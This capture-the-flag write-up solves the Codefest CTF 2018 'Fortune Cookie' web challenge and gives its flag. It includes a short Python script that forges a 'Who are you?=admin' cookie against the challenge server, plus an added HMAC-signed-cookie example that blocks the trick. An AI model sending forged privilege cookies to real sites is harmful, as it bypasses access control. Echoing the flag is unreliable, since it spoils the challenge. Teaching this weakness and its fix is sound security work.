Codefest CTF 2018: Fortune Cookie

Challenge

H4k3r has heard that there is a secret hidden behind this website, but he is confused as to how to get access to it. Can you help him?

Solution

Open your web browser’s Developer Tools and switch to the Network tab before you load the page, so the request and its response are captured and you can examine them more closely.

If you check the headers shown for that request, the response carries Set-Cookie: Who are you?=Me… but the cookie has already expired, so the browser never sends it back.

So you can use something to set the cookie Who are you? to the value admin yourself, and the flag will pop out. Here’s my get_flag script:

import requests

url = 'http://34.216.132.109:8084/'

# Send the cookie the server looks for, with the value it treats as privileged
cookies = {'Who are you?': 'admin'}

r = requests.get(url, cookies=cookies)
print(r.text)

The flag is: CodefestCTF{f0r7Un4B1sC0TtO}
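The challenge works because the server takes the cookie value as the caller's identity with no integrity check. The following is an added example, not part of the original writeup or the challenge's code, contrasting that check with an HMAC-signed cookie; the function names, the `role.tag` cookie layout and the key handling are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a server-side secret that never leaves the server (generated for the demo).
SECRET_KEY = secrets.token_bytes(32)
COOKIE_NAME = "Who are you?"  # cookie name taken from the writeup


def is_admin_trusting(cookies):
    """Weak pattern: the role is whatever the client claims it is."""
    return cookies.get(COOKIE_NAME) == "admin"


def issue_cookie(role, key=SECRET_KEY):
    """Server side: bind the role to an HMAC-SHA256 tag (hypothetical 'role.tag' layout)."""
    tag = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    return f"{role}.{tag}"


def read_role(cookies, key=SECRET_KEY):
    """Return the role only if its tag verifies; otherwise None."""
    value = cookies.get(COOKIE_NAME, "")
    role, sep, tag = value.rpartition(".")
    if not sep:
        return None  # no tag at all, e.g. a bare "admin"
    expected = hmac.new(key, role.encode(), hashlib.sha256).hexdigest()
    # Compare as bytes in constant time; also safe for non-ASCII client input.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return role


def is_admin_verified(cookies, key=SECRET_KEY):
    return read_role(cookies, key) == "admin"


if __name__ == "__main__":
    forged = {COOKIE_NAME: "admin"}  # constructed: what the get_flag script sends
    print("trusting check:", is_admin_trusting(forged))
    print("verified check:", is_admin_verified(forged))
    print("server-issued :", is_admin_verified({COOKIE_NAME: issue_cookie("admin")}))
```

Signing only stops tampering; a server-side session keyed by a random identifier avoids putting the role in the cookie at all.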
